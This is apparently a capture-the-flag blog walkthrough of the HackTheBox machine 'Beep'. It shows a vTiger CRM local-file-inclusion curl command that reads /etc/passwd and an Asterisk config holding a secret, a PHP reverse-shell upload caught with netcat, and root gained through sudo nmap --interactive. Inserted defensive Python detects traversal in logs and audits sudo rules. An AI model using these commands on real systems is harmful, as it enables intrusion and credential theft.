30 March 2023

Pentesting Fun Stuff

following the cyber security path…

BEEP

First a scan to get the open ports and services running.

PORT      STATE SERVICE    VERSION
22/tcp    open  ssh        OpenSSH 4.3 (protocol 2.0)
| ssh-hostkey:
|   1024 ad:ee:5a:bb:69:37:fb:27:af:b8:30:72:a0:f9:6f:53 (DSA)
|_  2048 bc:c6:73:59:13:a1:8a:4b:55:07:50:f6:65:1d:6d:0d (RSA)
25/tcp    open  smtp       Postfix smtpd
|_smtp-commands: beep.localdomain, PIPELINING, SIZE 10240000, VRFY, ETRN, ENHANCEDSTATUSCODES, 8BITMIME, DSN,
80/tcp    open  http       Apache httpd 2.2.3
|_http-server-header: Apache/2.2.3 (CentOS)
|_http-title: Did not follow redirect to https://10.10.10.7/
110/tcp   open  pop3       Cyrus pop3d 2.3.7-Invoca-RPM-2.3.7-7.el5_6.4
|_pop3-capabilities: IMPLEMENTATION(Cyrus POP3 server v2) PIPELINING EXPIRE(NEVER) STLS AUTH-RESP-CODE UIDL LOGIN-DELAY(0) APOP USER RESP-CODES TOP
111/tcp   open  rpcbind    2 (RPC #100000)
| rpcinfo:
|   program version   port/proto  service
|   100000  2            111/tcp  rpcbind
|   100000  2            111/udp  rpcbind
|   100024  1            743/udp  status
|_  100024  1            746/tcp  status
143/tcp   open  imap       Cyrus imapd 2.3.7-Invoca-RPM-2.3.7-7.el5_6.4
|_imap-capabilities: OK Completed NO SORT NAMESPACE BINARY THREAD=REFERENCES MAILBOX-REFERRALS X-NETSCAPE CATENATE THREAD=ORDEREDSUBJECT LISTEXT LIST-SUBSCRIBED MULTIAPPEND RIGHTS=kxte STARTTLS URLAUTHA0001 RENAME ATOMIC ANNOTATEMORE IDLE UNSELECT IMAP4 CONDSTORE IMAP4rev1 CHILDREN UIDPLUS QUOTA SORT=MODSEQ ID ACL LITERAL+
443/tcp   open  ssl/http   Apache httpd 2.2.3 ((CentOS))
| http-robots.txt: 1 disallowed entry
|_/
|_http-server-header: Apache/2.2.3 (CentOS)
|_http-title: Elastix - Login page
| ssl-cert: Subject: commonName=localhost.localdomain/organizationName=SomeOrganization/stateOrProvinceName=SomeState/countryName=--
| Not valid before: 2017-04-07T08:22:08
|_Not valid after:  2018-04-07T08:22:08
|_ssl-date: 2018-06-21T12:15:07+00:00; -1h20m00s from scanner time.
746/tcp   open  status     1 (RPC #100024)
993/tcp   open  ssl/imap   Cyrus imapd
|_imap-capabilities: CAPABILITY
995/tcp   open  pop3       Cyrus pop3d
3306/tcp  open  mysql      MySQL (unauthorized)
4190/tcp  open  sieve      Cyrus timsieved 2.3.7-Invoca-RPM-2.3.7-7.el5_6.4 (included w/cyrus imap)
4445/tcp  open  upnotifyp?
4559/tcp  open  hylafax    HylaFAX 4.3.10
5038/tcp  open  asterisk   Asterisk Call Manager 1.1
10000/tcp open  http       MiniServ 1.570 (Webmin httpd)
|_http-title: Site doesn't have a title (text/html; Charset=iso-8859-1).
Service Info: Hosts:  beep.localdomain, 127.0.0.1, example.com, localhost; OS: Unix
Host script results:
|_clock-skew: mean: -1h20m00s, deviation: 0s, median: -1h20m00s

A lot of open ports. Let’s start with the webserver.

Webserver 10.10.10.7:443

Webserver 10.10.10.7:443/admin


root@n0w4n:~/opt/htb/beep# searchsploit elastix
--------------------------------------------------------------------------------------------------------------------------------------------------- ----------------------------------------
 Exploit Title                                                                                                                                     |  Path
                                                                                                                                                   | (/usr/share/exploitdb/)
--------------------------------------------------------------------------------------------------------------------------------------------------- ----------------------------------------
Elastix - 'page' Cross-Site Scripting                                                                                                              | exploits/php/webapps/38078.py
Elastix - Multiple Cross-Site Scripting Vulnerabilities                                                                                            | exploits/php/webapps/38544.txt
Elastix 2.0.2 - Multiple Cross-Site Scripting Vulnerabilities                                                                                      | exploits/php/webapps/34942.txt
Elastix 2.2.0 - 'graph.php' Local File Inclusion                                                                                                   | exploits/php/webapps/37637.pl
Elastix 2.x - Blind SQL Injection                                                                                                                  | exploits/php/webapps/36305.txt
Elastix < 2.5 - PHP Code Injection                                                                                                                 | exploits/php/webapps/38091.php
FreePBX 2.10.0 / Elastix 2.2.0 - Remote Code Execution                                                                                             | exploits/php/webapps/18650.py
--------------------------------------------------------------------------------------------------------------------------------------------------- ----------------------------------------

After a quick lookup it looks like Elastix has some issues. Combining that with FreePBX, I think I’m going to check out the Python script first, which should exploit an RCE vulnerability.
The Python script needs a little tweaking with the hosts, and it gives the following description:

# On Elastix, once we have a shell, we can escalate to root:
# root@bt:~# nc -lvp 443
# listening on [any] 443 ...
# connect to [172.16.254.223] from voip [172.16.254.72] 43415
# id
# uid=100(asterisk) gid=101(asterisk)
# sudo nmap --interactive

That shouldn’t be too hard.

Traceback (most recent call last):
  File "18650.py", line 27, in <module>
    urllib.urlopen(url)
  File "/usr/lib/python2.7/urllib.py", line 87, in urlopen
    return opener.open(url)
  File "/usr/lib/python2.7/urllib.py", line 213, in open
    return getattr(self, name)(url)
  File "/usr/lib/python2.7/urllib.py", line 443, in open_https
    h.endheaders(data)
  File "/usr/lib/python2.7/httplib.py", line 1038, in endheaders
    self._send_output(message_body)
  File "/usr/lib/python2.7/httplib.py", line 882, in _send_output
    self.send(msg)
  File "/usr/lib/python2.7/httplib.py", line 844, in send
    self.connect()
  File "/usr/lib/python2.7/httplib.py", line 1263, in connect
    server_hostname=server_hostname)
  File "/usr/lib/python2.7/ssl.py", line 369, in wrap_socket
    _context=self)
  File "/usr/lib/python2.7/ssl.py", line 617, in __init__
    self.do_handshake()
  File "/usr/lib/python2.7/ssl.py", line 846, in do_handshake
    self._sslobj.do_handshake()
IOError: [Errno socket error] [SSL: CERTIFICATE_VERIFY_FAILED] certificate verify failed (_ssl.c:726)

It gives back an error. It looks like there are some problems with SSL. Some adjustments to the script:

import ssl
ssl._create_default_https_context = ssl._create_unverified_context

After the adjustment the script runs fine, but there is no shell. Time to scan for the known VOIP devices and get more info.

root@n0w4n:~/opt/htb/beep# svmap 10.10.10.7 -vv
DEBUG:root:started logging
DEBUG:root:parsing range of ports: 5060
DEBUG:DrinkOrSip:external ip was not set
INFO:DrinkOrSip:trying to get self ip .. might take a while
DEBUG:DrinkOrSip:External ip: 127.0.1.1:5060
DEBUG:DrinkOrSip:Compact mode: False
DEBUG:DrinkOrSip:From: sipvicious <sip:100@1.1.1.1>
INFO:root:start your engines
DEBUG:DrinkOrSip:binding to 0.0.0.0:5060
DEBUG:DrinkOrSip:sending packet to 10.10.10.7:5060
DEBUG:DrinkOrSip:packet: 'OPTIONS sip:100@10.10.10.7 SIP/2.0\r\nVia: SIP/2.0/UDP 127.0.1.1:5060;branch=z9hG4bK-2103700663;rport\r\nContent-Length: 0\r\nFrom: "sipvicious"<sip:100@1.1.1.1>;tag=3061306130613037313363340132353839373937383931\r\nAccept: application/sdp\r\nUser-Agent: friendly-scanner\r\nTo: "sipvicious"<sip:100@1.1.1.1>\r\nContact: sip:100@127.0.1.1:5060\r\nCSeq: 1 OPTIONS\r\nCall-ID: 851657692881764133361587\r\nMax-Forwards: 70\r\n\r\n'
DEBUG:DrinkOrSip:no more hosts to scan
DEBUG:DrinkOrSip:Making sure that no packets get lost
DEBUG:DrinkOrSip:Come to daddy
DEBUG:DrinkOrSip:running fingerPrintPacket()
DEBUG:DrinkOrSip:Fingerprint: disabled
DEBUG:DrinkOrSip:Uaname: FPBX-2.8.1(1.8.7.0)
INFO:DrinkOrSip:10.10.10.7:5060	->	10.10.10.7:5060	->	FPBX-2.8.1(1.8.7.0)	->	disabled
INFO:root:we have 1 devices
| SIP Device      | User Agent          | Fingerprint |
-------------------------------------------------------
| 10.10.10.7:5060 | FPBX-2.8.1(1.8.7.0) | disabled    |
INFO:root:Total time: 0:00:03.076845
root@n0w4n:~/opt/htb/beep# svwar -vv 10.10.10.7
DEBUG:root:started logging
DEBUG:TakeASip:external ip was not set
INFO:TakeASip:trying to get self ip .. might take a while
INFO:root:start your engines
DEBUG:TakeASip:binding to any:5060
ERROR:TakeASip:socket error: timed out
WARNING:root:found nothing
INFO:root:Total time: 0:00:03.160302

Looking at the output I could smack myself silly. The scripts try to bind with port 5060, which is the default port for SIP… and it is closed… from the beginning!
So it’s back to the initial port scan and check out what’s next.
I decide to get back to the webserver and run a dirsearch scan.

root@n0w4n:~/opt/tools/dirsearch# python3 dirsearch.py -u https://10.10.10.7 -w /usr/share/wordlists/dirbuster/directory-list-1.0.txt -e php,txt -x 403,404
 _|. _ _  _  _  _ _|_    v0.3.8
(_||| _) (/_(_|| (_| )
Extensions: php, txt | Threads: 10 | Wordlist size: 141667
Error Log: /root/opt/tools/dirsearch/logs/errors-18-06-27_10-38-22.log
Target: https://10.10.10.7
[10:38:22] Starting:
[10:38:23] 200 -    2KB - /
[10:38:24] 301 -  308B  - /help  ->  https://10.10.10.7/help/
[10:38:25] 301 -  310B  - /images  ->  https://10.10.10.7/images/
[10:38:53] 301 -  314B  - /recordings  ->  https://10.10.10.7/recordings/
[10:39:09] 301 -  309B  - /panel  ->  https://10.10.10.7/panel/
[10:40:07] 301 -  310B  - /static  ->  https://10.10.10.7/static/
[10:40:11] 301 -  310B  - /themes  ->  https://10.10.10.7/themes/
[10:40:31] 301 -  309B  - /admin  ->  https://10.10.10.7/admin/
[10:45:06] 301 -  308B  - /mail  ->  https://10.10.10.7/mail/
[10:45:11] 301 -  311B  - /modules  ->  https://10.10.10.7/modules/
[10:46:13] 301 -  308B  - /lang  ->  https://10.10.10.7/lang/
[10:49:12] 301 -  313B  - /vtigercrm  ->  https://10.10.10.7/vtigercrm/

root@n0w4n:~/opt/htb/beep# searchsploit vtiger crm
--------------------------------------------------------------------------------------------------------------------------------------------------- ----------------------------------------
 Exploit Title                                                                                                                                     |  Path
                                                                                                                                                   | (/usr/share/exploitdb/)
--------------------------------------------------------------------------------------------------------------------------------------------------- ----------------------------------------
Vtiger CRM 6.3.0 - Authenticated Arbitrary File Upload (Metasploit)                                                                                | exploits/php/webapps/44379.rb
vTiger CRM 4.2 - 'calpath' Multiple Remote File Inclusions                                                                                         | exploits/php/webapps/2508.txt
vTiger CRM 4.2 - SQL Injection                                                                                                                     | exploits/php/webapps/26586.txt
vTiger CRM 4.2 Leads Module - 'record' Cross-Site Scripting                                                                                        | exploits/php/webapps/26584.txt
vTiger CRM 4.2 RSS Aggregation Module - Feed Cross-Site Scripting                                                                                  | exploits/php/webapps/26585.txt
vTiger CRM 5.0.4 - Multiple Cross-Site Scripting Vulnerabilities                                                                                   | exploits/php/webapps/32307.txt
vTiger CRM 5.0.4 - Remote Code Execution / Cross-Site Request Forgery / Local File Inclusion / Cross-Site Scripting                                | exploits/php/webapps/9450.txt
vTiger CRM 5.0.4 - Unauthenticated Local File Inclusion                                                                                            | exploits/php/webapps/16280.py
vTiger CRM 5.1.0 - Local File Inclusion                                                                                                            | exploits/php/webapps/18770.txt
vTiger CRM 5.2 - 'onlyforuser' SQL Injection                                                                                                       | exploits/php/webapps/36208.txt
vTiger CRM 5.2.1 - 'PHPrint.php' Multiple Cross-Site Scripting Vulnerabilities                                                                     | exploits/php/webapps/36204.txt
vTiger CRM 5.2.1 - 'index.php' Multiple Cross-Site Scripting Vulnerabilities (1)                                                                   | exploits/php/webapps/36203.txt
vTiger CRM 5.2.1 - 'index.php' Multiple Cross-Site Scripting Vulnerabilities (2)                                                                   | exploits/php/webapps/36255.txt
vTiger CRM 5.2.1 - 'sortfieldsjson.php' Local File Inclusion                                                                                       | exploits/php/webapps/35574.txt
vTiger CRM 5.2.1 - 'vtigerservice.php' Cross-Site Scripting                                                                                        | exploits/php/webapps/35577.txt
vTiger CRM 5.3.0 5.4.0 - Authenticated Remote Code Execution (Metasploit)                                                                          | exploits/php/remote/29319.rb
vTiger CRM 5.4.0 - 'index.php?onlyforuser' SQL Injection                                                                                           | exploits/php/webapps/28409.txt
vTiger CRM 5.4.0 SOAP - AddEmailAttachment Arbitrary File Upload (Metasploit)                                                                      | exploits/php/remote/30787.rb
vTiger CRM 5.4.0 SOAP - Multiple Vulnerabilities                                                                                                   | exploits/php/webapps/27279.txt
vTiger CRM 5.4.0/6.0 RC/6.0.0 GA - 'browse.php' Local File Inclusion                                                                               | exploits/php/webapps/32213.txt
vTiger CRM 6.3.0 - Authenticated Remote Code Execution                                                                                             | exploits/php/webapps/38345.txt
--------------------------------------------------------------------------------------------------------------------------------------------------- ----------------------------------------
Shellcodes: No Result

Looks like version 5.1.0 has an LFI vulnerability.

# Exploit Title: VTiger CRM
# Google Dork: None
# Date: 20/03/2012
# Author: Pi3rrot
# Software Link: http://sourceforge.net/projects/vtigercrm/files/vtiger%20CRM%205.1.0/
# Version: 5.1.0
# Tested on: CentOS 6
# CVE : none
We have found this vulnerability in VTiger 5.1.0
In this example, you can see a Local File Inclusion in the file sortfieldsjson.php
Try this:
https://localhost/vtigercrm/modules/com_vtiger_workflow/sortfieldsjson.php?module_name=../../../../../../../../etc/passwd%00

That’s easy to test.

root@n0w4n:~# curl -k https://10.10.10.7/vtigercrm/modules/com_vtiger_workflow/sortfieldsjson.php?module_name=../../../../../../../../etc/passwd%00
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
news:x:9:13:news:/etc/news:
uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin
operator:x:11:0:operator:/root:/sbin/nologin
games:x:12:100:games:/usr/games:/sbin/nologin
gopher:x:13:30:gopher:/var/gopher:/sbin/nologin
ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
nobody:x:99:99:Nobody:/:/sbin/nologin
mysql:x:27:27:MySQL Server:/var/lib/mysql:/bin/bash
distcache:x:94:94:Distcache:/:/sbin/nologin
vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin
pcap:x:77:77::/var/arpwatch:/sbin/nologin
ntp:x:38:38::/etc/ntp:/sbin/nologin
cyrus:x:76:12:Cyrus IMAP Server:/var/lib/imap:/bin/bash
dbus:x:81:81:System message bus:/:/sbin/nologin
apache:x:48:48:Apache:/var/www:/sbin/nologin
mailman:x:41:41:GNU Mailing List Manager:/usr/lib/mailman:/sbin/nologin
rpc:x:32:32:Portmapper RPC user:/:/sbin/nologin
postfix:x:89:89::/var/spool/postfix:/sbin/nologin
asterisk:x:100:101:Asterisk VoIP PBX:/var/lib/asterisk:/bin/bash
rpcuser:x:29:29:RPC Service User:/var/lib/nfs:/sbin/nologin
nfsnobody:x:65534:65534:Anonymous NFS User:/var/lib/nfs:/sbin/nologin
sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
spamfilter:x:500:500::/home/spamfilter:/bin/bash
haldaemon:x:68:68:HAL daemon:/:/sbin/nologin
xfs:x:43:43:X Font Server:/etc/X11/fs:/sbin/nologin
fanis:x:501:501::/home/fanis:/bin/bash
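
Added example (not part of the original write-up): a check a defender could run over the web server's access log to spot requests like the one above, where a query parameter carries ".." path segments and a null byte. The log lines are constructed, and the Apache combined log format is an assumption.

```python
import re
from urllib.parse import urlsplit, unquote_to_bytes

# Constructed access-log lines (Apache "combined" format assumed), not real traffic.
SAMPLE_LOG = """\
10.10.14.2 - - [27/Jun/2018:10:51:02 +0000] "GET /vtigercrm/modules/com_vtiger_workflow/sortfieldsjson.php?module_name=../../../../../../../../etc/passwd%00 HTTP/1.1" 200 1742 "-" "curl/7.60.0"
10.10.14.2 - - [27/Jun/2018:10:52:40 +0000] "GET /vtigercrm/modules/com_vtiger_workflow/sortfieldsjson.php?module_name=..%2f..%2f..%2fetc%2fasterisk%2fmanager.conf%2500 HTTP/1.1" 200 903 "-" "curl/7.60.0"
192.0.2.10 - - [27/Jun/2018:10:53:11 +0000] "GET /vtigercrm/modules/com_vtiger_workflow/sortfieldsjson.php?module_name=Accounts HTTP/1.1" 200 512 "-" "Mozilla/5.0"
192.0.2.10 - - [27/Jun/2018:10:53:15 +0000] "GET /help/?file=report..final.pdf HTTP/1.1" 200 210 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) '
)

def fully_decode(raw, max_rounds=3):
    """Percent-decode repeatedly so double-encoded input (%252f, %2500) is caught."""
    data = raw.encode("utf-8")
    for _ in range(max_rounds):
        decoded = unquote_to_bytes(data)
        if decoded == data:
            break
        data = decoded
    return data

def findings_for_value(value):
    """Return the reasons a decoded parameter value looks like a file-inclusion probe."""
    reasons = []
    # Only a whole ".." path segment counts; "report..final.pdf" is not traversal.
    if b".." in re.split(rb"[/\\]", value):
        reasons.append("path traversal")
    if b"\x00" in value:
        reasons.append("null byte")
    return reasons

def scan(log_text):
    """Yield one alert per suspicious query parameter found in the log."""
    alerts = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        parts = urlsplit(m["target"])
        for pair in parts.query.split("&"):
            name, _, raw = pair.partition("=")
            reasons = findings_for_value(fully_decode(raw))
            if reasons:
                alerts.append({
                    "ip": m["ip"], "time": m["ts"], "path": parts.path,
                    "param": name, "reasons": reasons,
                    # A 200 means the server answered; treat the file as disclosed.
                    "served": m["status"] == "200",
                })
    return alerts

if __name__ == "__main__":
    for alert in scan(SAMPLE_LOG):
        print(alert)
```

An alert with "served" set to true on a config file path means any secret in that file should be rotated.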

Let’s grab the first flag.

root@n0w4n:~# curl -k https://10.10.10.7/vtigercrm/modules/com_vtiger_workflow/sortfieldsjson.php?module_name=../../../../../../../../home/fanis/user.txt%00
aeff3def0c765c2677b94715cffa73ac

Because I don’t have the ability to search at my leisure in the file system, I’m going to look for interesting files for the programs I know are installed and to which I have access, like Asterisk (https://www.voip-info.org/asterisk-config-files/).

root@n0w4n:~# curl -k https://10.10.10.7/vtigercrm/modules/com_vtiger_workflow/sortfieldsjson.php?module_name=../../../../../../../../etc/asterisk/manager.conf%00
;
; AMI - Asterisk Manager interface
;
; FreePBX needs this to be enabled. Note that if you enable it on a different IP, you need
; to assure that this can't be reached from un-authorized hosts with the ACL settings (permit/deny).
; Also, remember to configure non-default port or IP-addresses in amportal.conf.
;
; The AMI connection is used both by the portal and the operator's panel in FreePBX.
;
; FreePBX assumes an AMI connection to localhost:5038 by default.
;
[general]
enabled = yes
port = 5038
bindaddr = 0.0.0.0
displayconnects=no ;only effects 1.6+
[admin]
secret = jEhdIekWmdjE
deny=0.0.0.0/0.0.0.0
permit=127.0.0.1/255.255.255.0
read = system,call,log,verbose,command,agent,user,config,command,dtmf,reporting,cdr,dialplan,originate
write = system,call,log,verbose,command,agent,user,config,command,dtmf,reporting,cdr,dialplan,originate
#include manager_additional.conf
#include manager_custom.conf

After a few tries I get some credentials. With these credentials I have access to the dashboard of Elastix, FreePBX and vtigerCRM.
With vtigercrm there are a few possibilities to upload files. I go with changing the company logo.

For the uploading of the file I’ll use the php reverse shell script from pentestmonkey. After uploading the file I find the uploaded file in the /test/ folder.

root@n0w4n:~/opt/htb/beep# nc -lnvp 31337
listening on [any] 31337 ...
connect to [10.10.14.2] from (UNKNOWN) [10.10.10.7] 58766
Linux beep 2.6.18-238.12.1.el5 #1 SMP Tue May 31 13:23:01 EDT 2011 i686 i686 i386 GNU/Linux
 12:55:40 up 2 days,  9:44,  0 users,  load average: 0.00, 0.06, 0.07
USER     TTY      FROM              LOGIN@   IDLE   JCPU   PCPU WHAT
uid=100(asterisk) gid=101(asterisk) groups=101(asterisk)
sh: no job control in this shell
sh-3.2$ id
uid=100(asterisk) gid=101(asterisk) groups=101(asterisk)

Now for root.

sh-3.2$ sudo -l
Matching Defaults entries for asterisk on this host:
    env_reset, env_keep="COLORS DISPLAY HOSTNAME HISTSIZE INPUTRC KDEDIR
    LS_COLORS MAIL PS1 PS2 QTDIR USERNAME LANG LC_ADDRESS LC_CTYPE LC_COLLATE
    LC_IDENTIFICATION LC_MEASUREMENT LC_MESSAGES LC_MONETARY LC_NAME LC_NUMERIC
    LC_PAPER LC_TELEPHONE LC_TIME LC_ALL LANGUAGE LINGUAS _XKB_CHARSET
    XAUTHORITY"
User asterisk may run the following commands on this host:
    (root) NOPASSWD: /sbin/shutdown
    (root) NOPASSWD: /usr/bin/nmap
    (root) NOPASSWD: /usr/bin/yum
    (root) NOPASSWD: /bin/touch
    (root) NOPASSWD: /bin/chmod
    (root) NOPASSWD: /bin/chown
    (root) NOPASSWD: /sbin/service
    (root) NOPASSWD: /sbin/init
    (root) NOPASSWD: /usr/sbin/postmap
    (root) NOPASSWD: /usr/sbin/postfix
    (root) NOPASSWD: /usr/sbin/saslpasswd2
    (root) NOPASSWD: /usr/sbin/hardware_detector
    (root) NOPASSWD: /sbin/chkconfig
    (root) NOPASSWD: /usr/sbin/elastix-helper

There are some flags for nmap that require root, like -sS, but for a restricted user this is not a normal choice. Also, having nmap at root level gives great possibilities.
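
Added example (not part of the original write-up): a small audit that parses `sudo -l` output like the listing above and flags passwordless root entries whose binary is too powerful for a service account. The RISK_NOTES table is an assumption of this example and is not exhaustive.

```python
import posixpath
import re

# The rule lines from the `sudo -l` output above (Defaults lines left out).
SUDO_L = """\
User asterisk may run the following commands on this host:
    (root) NOPASSWD: /sbin/shutdown
    (root) NOPASSWD: /usr/bin/nmap
    (root) NOPASSWD: /usr/bin/yum
    (root) NOPASSWD: /bin/touch
    (root) NOPASSWD: /bin/chmod
    (root) NOPASSWD: /bin/chown
    (root) NOPASSWD: /sbin/service
    (root) NOPASSWD: /sbin/init
    (root) NOPASSWD: /usr/sbin/postmap
    (root) NOPASSWD: /usr/sbin/postfix
    (root) NOPASSWD: /usr/sbin/saslpasswd2
    (root) NOPASSWD: /usr/sbin/hardware_detector
    (root) NOPASSWD: /sbin/chkconfig
    (root) NOPASSWD: /usr/sbin/elastix-helper
"""

# Reviewer-maintained notes (assumption of this example): why each binary is
# unsafe to grant as root to an unprivileged account.
RISK_NOTES = {
    "nmap": "interactive mode in old releases can run commands as root",
    "yum": "package installation runs package scripts as root",
    "chmod": "can change permissions on any file",
    "chown": "can change ownership of any file",
    "service": "starts and stops arbitrary init scripts as root",
}

ENTRY_RE = re.compile(
    r"^\s*\((?P<runas>[^)]+)\)\s*(?P<tags>(?:[A-Z_]+:\s*)*)(?P<cmds>.+)$"
)

def parse_sudo_l(text):
    """Turn the rule lines of `sudo -l` into dicts: runas, nopasswd, command."""
    entries, in_rules = [], False
    for line in text.splitlines():
        if "may run the following commands" in line:
            in_rules = True
            continue
        m = ENTRY_RE.match(line) if in_rules else None
        if not m:
            continue
        tags = set(re.findall(r"[A-Z_]+", m["tags"]))
        for cmd in m["cmds"].split(","):
            cmd = cmd.strip()
            if cmd:
                entries.append({"runas": m["runas"],
                                "nopasswd": "NOPASSWD" in tags,
                                "command": cmd})
    return entries

def audit(entries):
    """Return entries that run as root (or ALL) and match a risk note."""
    findings = []
    for entry in entries:
        if "root" not in entry["runas"] and "ALL" not in entry["runas"]:
            continue
        binary = posixpath.basename(entry["command"].split()[0])
        note = "unrestricted" if entry["command"] == "ALL" else RISK_NOTES.get(binary)
        if note:
            findings.append({**entry, "note": note})
    return findings

if __name__ == "__main__":
    for finding in audit(parse_sudo_l(SUDO_L)):
        flag = "NOPASSWD" if finding["nopasswd"] else "password required"
        print(f'{finding["command"]:<20} {flag:<18} {finding["note"]}')
```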

sh-3.2$ sudo nmap --interactive
Starting Nmap V. 4.11 ( http://www.insecure.org/nmap/ )
Welcome to Interactive Mode -- press h <enter> for help
nmap> !id
uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)
nmap> waiting to reap child: No child processes (10)
!sh
id
uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)
cd /root
ls
anaconda-ks.cfg
elastix-pr-2.2-1.i386.rpm
install.log
install.log.syslog
postnochroot
root.txt
webmin-1.570-1.noarch.rpm
cat root.txt
/bin/cat: line 1: bash:: command not found
/bin/cat: line 2: /etc/passwd:: No such file or directory
/bin/cat: line 3: /etc/passwd:: No such file or directory
/bin/cat: line 4: /etc/passwd:: No such file or directory
/bin/cat: line 5: /etc/passwd:: No such file or directory
/bin/cat: line 6: /etc/passwd:: No such file or directory
/bin/cat: line 7: /etc/passwd:: No such file or directory
/bin/cat: line 8: /etc/passwd:: No such file or directory
/bin/cat: line 9: /etc/passwd:: No such file or directory
/bin/cat: line 10: /etc/passwd:: No such file or directory
/bin/cat: line 11: /etc/passwd:: No such file or directory
/bin/cat: line 12: /etc/passwd:: No such file or directory
/bin/cat: line 13: /etc/passwd:: No such file or directory
/bin/cat: line 14: /etc/passwd:: No such file or directory
/bin/cat: line 15: /etc/passwd:: No such file or directory
/bin/cat: line 16: /etc/passwd:: No such file or directory
/bin/cat: line 17: /etc/passwd:: No such file or directory
/bin/cat: line 18: /etc/passwd:: No such file or directory
/bin/cat: line 19: /etc/passwd:: No such file or directory
/bin/cat: line 20: /etc/passwd:: No such file or directory
/bin/cat: line 21: /etc/passwd:: No such file or directory
/bin/cat: line 22: /etc/passwd:: No such file or directory
/bin/cat: line 23: /etc/passwd:: No such file or directory
/bin/cat: line 24: /etc/passwd:: No such file or directory
/bin/cat: line 25: /etc/passwd:: No such file or directory
/bin/cat: line 26: /etc/passwd:: No such file or directory
/bin/cat: line 27: /etc/passwd:: No such file or directory
/bin/cat: line 28: /etc/passwd:: No such file or directory
/bin/cat: line 29: /etc/passwd:: No such file or directory
/bin/cat: line 30: /etc/passwd:: No such file or directory
/bin/cat: line 31: /etc/passwd:: No such file or directory
/bin/cat: line 32: /etc/passwd:: No such file or directory
/bin/cat: line 33: /etc/passwd:: No such file or directory
/bin/cat: line 34: /etc/passwd:: No such file or directory
/bin/cat: line 35: /etc/passwd:: No such file or directory
/bin/cat: line 36: /etc/passwd:: No such file or directory

No /bin/cat? LOL… funny… but no problem.

tac root.txt | tac
d88e006123842106982acce0aaf453f0

And it’s done!!!

2 thoughts on “BEEP”

  1. Hi!
    Thanks for this doc, very well done!
    I have a question 🙂
    Which reverse shell did you upload on vtigercrm? I’m blocked at this point since 2 days 🙁
    I uploaded a php reverse shell changing the extension to .php;.jpg in order to pass the sanity for the file. But then I cannot trigger the reverse shell.
    Any help?
    Thanks
